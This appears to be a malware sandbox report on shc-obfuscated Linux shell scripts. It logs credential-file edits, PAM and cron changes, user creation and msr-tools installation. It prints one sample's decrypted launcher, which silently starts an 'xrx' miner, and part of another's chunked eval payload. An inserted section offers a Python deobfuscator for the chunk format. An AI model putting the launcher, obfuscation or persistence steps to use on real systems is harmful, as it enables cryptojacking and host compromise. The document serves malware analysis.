File opened for reading /proc/22/cmdline /usr/bin/pidof N/A
File opened for reading /proc/36/cmdline /usr/bin/pidof N/A
File opened for reading /proc/49/stat /usr/bin/pidof N/A
File opened for reading /proc/52/stat /usr/bin/pidof N/A
File opened for reading /proc/1693/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1770/stat /usr/bin/pidof N/A
File opened for reading /proc/1911/stat /usr/bin/pidof N/A
File opened for reading /proc/17/stat /usr/bin/pidof N/A
File opened for reading /proc/32/stat /usr/bin/pidof N/A
File opened for reading /proc/357/stat /usr/bin/pidof N/A
File opened for reading /proc/1246/stat /usr/bin/pidof N/A
File opened for reading /proc/1331/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1935/stat /usr/bin/pidof N/A
File opened for reading /proc/2227/stat /usr/bin/pidof N/A
File opened for reading /proc/2303/cmdline /usr/bin/pidof N/A
File opened for reading /proc/2265/stat /usr/bin/pidof N/A
File opened for reading /proc/6/stat /usr/bin/pidof N/A
File opened for reading /proc/386/stat /usr/bin/pidof N/A
File opened for reading /proc/1057/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1794/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1990/cmdline /usr/bin/pidof N/A
File opened for reading /proc/765/cmdline /usr/bin/pidof N/A
File opened for reading /proc/772/stat /usr/bin/pidof N/A
File opened for reading /proc/1964/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1/stat /usr/bin/pidof N/A
File opened for reading /proc/39/stat /usr/bin/pidof N/A
File opened for reading /proc/51/stat /usr/bin/pidof N/A
File opened for reading /proc/63/stat /usr/bin/pidof N/A
File opened for reading /proc/601/stat /usr/bin/pidof N/A
File opened for reading /proc/1985/stat /usr/bin/pidof N/A
File opened for reading /proc/2013/cmdline /usr/bin/pidof N/A
File opened for reading /proc/195/cmdline /usr/bin/pidof N/A

Processes

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' "$@" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B]

/usr/bin/cat

[cat config.json]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/pidof

[pidof xrx]

/tmp/样本/Linux/shc加密脚本/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

debian9-mipsbe-20240418-en

Max time kernel

0s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

144s

Max time network

129s

Command Line

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

Signatures

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/sbin/usermod N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/823/maps /usr/sbin/needrestart N/A
File opened for reading /proc/892/maps /usr/sbin/needrestart N/A
File opened for reading /proc/598/maps /usr/sbin/needrestart N/A
File opened for reading /proc/785/maps /usr/sbin/needrestart N/A
File opened for reading /proc/438/maps /usr/sbin/needrestart N/A
File opened for reading /proc/599/maps /usr/sbin/needrestart N/A
File opened for reading /proc/777/maps /usr/sbin/needrestart N/A
File opened for reading /proc/784/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/389/maps /usr/sbin/needrestart N/A
File opened for reading /proc/744/maps /usr/sbin/needrestart N/A
File opened for reading /proc/769/maps /usr/sbin/needrestart N/A
File opened for reading /proc/787/maps /usr/sbin/needrestart N/A
File opened for reading /proc/418/maps /usr/sbin/needrestart N/A
File opened for reading /proc/588/maps /usr/sbin/needrestart N/A
File opened for reading /proc/761/maps /usr/sbin/needrestart N/A
File opened for reading /proc/773/maps /usr/sbin/needrestart N/A
File opened for reading /proc/820/maps /usr/sbin/needrestart N/A
File opened for reading /proc/828/maps /usr/sbin/needrestart N/A
File opened for reading /proc/357/maps /usr/sbin/needrestart N/A
File opened for reading /proc/750/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/2602/status /usr/bin/pkill N/A
File opened for reading /proc/1052/ctty /usr/bin/pkill N/A
File opened for reading /proc/54/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1047/root/usr/lib/python3.12/tarfile.py /usr/sbin/needrestart N/A
File opened for reading /proc/2245/status /usr/bin/pkill N/A
File opened for reading /proc/23/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2288/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1047/root/usr/lib/python3.12/pprint.py /usr/sbin/needrestart N/A
File opened for reading /proc/892/status /usr/bin/pkill N/A
File opened for reading /proc/2173/stat /usr/bin/pkill N/A
File opened for reading /proc/785/cgroup /usr/bin/pkill N/A
File opened for reading /proc/27/status /usr/bin/pkill N/A
File opened for reading /proc/389/ctty /usr/bin/pkill N/A
File opened for reading /proc/63/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1073/ctty /usr/bin/pkill N/A
File opened for reading /proc/1897/stat /usr/bin/pkill N/A
File opened for reading /proc/2206/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1792/stat /usr/bin/pkill N/A
File opened for reading /proc/2000/status /usr/bin/pkill N/A
File opened for reading /proc/2200/ctty /usr/bin/pkill N/A
File opened for reading /proc/357/stat /usr/bin/pkill N/A
File opened for reading /proc/63/status /usr/bin/pkill N/A
File opened for reading /proc/275/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1959/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1692/status /usr/bin/pkill N/A
File opened for reading /proc/14/ctty /usr/bin/pkill N/A
File opened for reading /proc/787/status /usr/bin/pkill N/A
File opened for reading /proc/1776/cmdline /usr/bin/pkill N/A
File opened for reading /proc/56/environ /usr/sbin/needrestart N/A
File opened for reading /proc/386/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/2545/stat /usr/bin/pkill N/A
File opened for reading /proc/13/ctty /usr/bin/pkill N/A
File opened for reading /proc/34/cgroup /usr/bin/pkill N/A
File opened for reading /proc/80/ctty /usr/bin/pkill N/A
File opened for reading /proc/48/environ /usr/sbin/needrestart N/A
File opened for reading /proc/2226/status /usr/bin/pkill N/A
File opened for reading /proc/1981/ctty /usr/bin/pkill N/A
File opened for reading /proc/196/stat /usr/bin/pkill N/A
File opened for reading /proc/357/ctty /usr/bin/pkill N/A
File opened for reading /proc/1689/stat /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/202/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2145/stat /usr/bin/pkill N/A
File opened for reading /proc/202/cgroup /usr/bin/pkill N/A
File opened for reading /proc/55/cmdline /usr/bin/pkill N/A
File opened for reading /proc/199/stat /usr/bin/pkill N/A
File opened for reading /proc/2602/cmdline /usr/bin/pkill N/A
File opened for reading /proc/769/status /usr/bin/pkill N/A
File opened for reading /proc/80/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1117/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/ctty /usr/bin/pkill N/A
File opened for reading /proc/1124/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1/ctty /usr/bin/pkill N/A
File opened for reading /proc/195/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1950/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1967/cgroup /usr/bin/pkill N/A
File opened for reading /proc/198/status /usr/bin/pkill N/A
File opened for reading /proc/1082/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2000/stat /usr/bin/pkill N/A
File opened for reading /proc/784/status /usr/bin/pkill N/A
File opened for reading /proc/2253/status /usr/bin/pkill N/A
File opened for reading /proc/56/ctty /usr/bin/pkill N/A
File opened for reading /proc/892/ctty /usr/bin/pkill N/A
File opened for reading /proc/23/cmdline /usr/sbin/needrestart N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/dpkg N/A
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A

Processes

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' "$@" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

z$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$u
Hz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz
$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]
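The command line above is a shell script obfuscated by splitting its text into two- and three-character chunks held in variables and reassembling them with `eval "$Az$Bz..."`; single quotes inside a chunk use the `'\''` idiom (e.g. `Mz=''\'''`), and the fragment on this page is truncated and starts mid-assignment. The parser below is an added example, not part of the sandbox report, and recovers the plaintext from a script in that style. Because the complete command line is not on this page, it runs on a constructed snippet written in the same format; the separator `$z` is assigned in the part of the script not shown, so the example assumes it is a newline.

```python
import re

# One chunk assignment, name='...'.  A chunk may contain a single quote via the
# '\'' idiom (close quote, escaped quote, reopen), e.g. Mz=''\''' in the report.
ASSIGN = re.compile(r"([A-Za-z_]\w*)='")
# The reassembly step: eval "$Az$Bz$Cz..."
EVAL = re.compile(r'eval\s+"((?:\$[A-Za-z_]\w*)+)"')
REF = re.compile(r"\$([A-Za-z_]\w*)")

# Constructed snippet in the same style as the command line above (NOT the
# sample's real content, which the page only carries as a truncated fragment).
SAMPLE = (
    "Az='ech';Bz='o \"';Cz='hel';Dz='lo'\\''';Ez='\"';"
    "Fz='chm';Gz='od ';Hz='u+s';Iz=' /b';Jz='in/';Kz='pas';Lz='swd'; "
    'eval "$Az$Bz$Cz$Dz$Ez$z$Fz$Gz$Hz$Iz$Jz$Kz$Lz"'
)


def parse_assignments(script):
    r"""Map every chunk variable to its literal value, honouring '\'' quoting."""
    values, pos = {}, 0
    while True:
        m = ASSIGN.search(script, pos)
        if not m:
            return values
        name, pos = m.group(1), m.end()        # pos: just past the opening quote
        parts = []
        while True:
            end = script.find("'", pos)        # closing quote of this segment
            if end < 0:                        # truncated input: keep what is there
                parts.append(script[pos:])
                pos = len(script)
                break
            parts.append(script[pos:end])
            pos = end + 1
            if script.startswith("\\'", pos):  # '\'' : literal quote, then reopen
                parts.append("'")
                pos += 2
                if script.startswith("'", pos):
                    pos += 1
                    continue
            break
        values[name] = "".join(parts)


def deobfuscate(script, defaults=None):
    """Expand the eval'd "$Az$Bz..." string into the plaintext script.
    `defaults` supplies variables assigned outside `script` (here the
    separator $z, assumed to be a newline); unknown names expand to ""."""
    values = dict(defaults or {})
    values.update(parse_assignments(script))
    m = EVAL.search(script)
    if not m:
        raise ValueError('no eval "$..." string found')
    return REF.sub(lambda r: values.get(r.group(1), ""), m.group(1))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE, defaults={"z": "\n"}))
```

Fed the complete command line instead of the constructed snippet, the same two functions yield the plaintext of which the process list that follows is the record; the chunk values are never executed, so the parser is safe to run on the raw sample text.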

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]
